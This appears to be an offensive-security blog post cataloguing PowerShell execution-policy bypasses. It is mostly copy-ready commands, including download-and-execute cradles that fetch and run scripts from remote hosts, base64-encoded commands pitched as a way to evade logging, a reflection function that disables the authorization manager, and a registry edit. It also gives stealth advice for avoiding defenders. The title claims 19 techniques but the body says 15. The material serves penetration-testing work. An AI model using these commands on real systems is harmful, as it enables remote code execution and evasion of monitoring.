19 Ways To Bypass PowerShell Execution Policy

PowerShell is an indispensable tool in the offensive security toolkit, providing a wide array of functionalities from system administration to complex scripting. However, execution policies often stand as a barrier to the seamless execution of scripts, necessitating the need for bypass techniques that can be crucial during engagements. This article outlines 15 techniques for bypassing PowerShell execution policies, offering a tactical overview for security professionals.

Techniques Overview

Each method detailed below serves as a potential avenue for executing PowerShell scripts, circumventing the restrictions imposed by execution policies. These techniques range from simple command-line arguments to more sophisticated methods involving encoding and remote execution strategies.

Echo and Pipe to PowerShell Standard In

A fundamental technique involves echoing a script and piping it directly into PowerShell, avoiding the need for script files:

$ # Paste commands into an Interactive PowerShell Console

$ echo Write-Host "Example Output" | PowerShell.exe -noprofile -

$ Get-Content .\script_to_run.ps1 | PowerShell.exe -noprofile -

$ TYPE .\script_to_run.ps1 | PowerShell.exe -noprofile -

$ powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://network-sec.de/ps_script')"

$ Powershell -command "Write-Host 'Example Output'"

$ Powershell -c "Write-Host 'Example Output'"

$ $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$ $encodedCommand = [Convert]::ToBase64String($bytes)
$ powershell.exe -EncodedCommand $encodedCommand

$ invoke-command -scriptblock {Write-Host "Example Output"}

$ invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force

$ Get-Content .\script_to_run.ps1 | Invoke-Expression

$ GC .\script_to_run.ps1 | iex

$ PowerShell.exe -ExecutionPolicy Bypass -File .\script_to_run.ps1

$ PowerShell.exe -ExecutionPolicy UnRestricted -File .\script_to_run.ps1

$ PowerShell.exe -ExecutionPolicy Remote-signed -File .\script_to_run.ps1

$ function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue($executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} 
$ Disable-ExecutionPolicy

$ Set-ExecutionPolicy Bypass -Scope Process

$ Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

$ Set-ItemProperty -Path "HKCU:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" -Name "ExecutionPolicy" -Value "Unrestricted"

More details about individual techniques

• Piping Scripts: Using Get-Content or TYPE commands allows for direct execution of scripts from the command line without creating a script file on disk.

  powershell

  $ Get-Content script.ps1 | PowerShell.exe -ExecutionPolicy Bypass -

  powershell

  $ TYPE script.ps1 | PowerShell.exe -ExecutionPolicy Bypass -

  These methods are particularly useful in environments where writing to disk is restricted or monitored.

• Remote Execution with Invoke-Expression (IEX): Executes scripts directly from a remote source. This method is effective in scenarios where local script execution is monitored or blocked.

  powershell

  $ IEX (New-Object Net.WebClient).DownloadString('http://remote/script.ps1')

  Ideal for executing payloads hosted on a controlled server, minimizing the footprint on the target system.

• Base64 Encoding with -EncodedCommand: Encodes the entire PowerShell command or script in base64 to bypass simple command line logging mechanisms and execute complex scripts.

  powershell

  $ $EncodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('Write-Host "Hello World"'))
  $ PowerShell.exe -EncodedCommand $EncodedCommand

  This approach is beneficial when dealing with systems that have command line argument logging, as the encoded command obscures the actual PowerShell code being executed.

Execution Policy Bypass Flags

• Using -ExecutionPolicy Bypass: Temporarily overrides the current execution policy to execute a script without making permanent changes to the system policy.

  powershell

  $ PowerShell.exe -ExecutionPolicy Bypass -File .\script_to_run.ps1

  This flag is essential for executing scripts on systems with restrictive execution policies, as it does not require administrative privileges to alter system-wide settings.

• Scoped Policy Adjustment: Applying execution policy changes to a specific scope without affecting the global execution policy.

  • Process Scope: Applies only to the current PowerShell session.
    powershell

    $ Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass

  • CurrentUser Scope: Affects all PowerShell sessions initiated by the current user, persisting across logins without needing administrative rights.
    powershell

    $ Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass

  These scoped adjustments are critical in environments where you need to maintain operational stealth and avoid altering system-wide configurations that could alert defenders.

Considerations for Tactical Use

• Selection of Technique: The choice of bypass technique should be guided by the target environment’s restrictions and monitoring capabilities. For instance, environments with stringent network egress monitoring may require localized execution methods to avoid detection.

• Operational Security (OpSec): When employing these techniques, consider the digital footprint left behind. Techniques that avoid disk writes or obscure command execution through encoding are preferable in high-security environments.

Understanding these PowerShell execution policy bypass techniques in depth provides offensive security professionals with a versatile toolkit for navigating and exploiting secure environments. Mastery of these methods allows for the execution of PowerShell scripts under various constraints, enhancing the effectiveness of penetration testing and red teaming activities.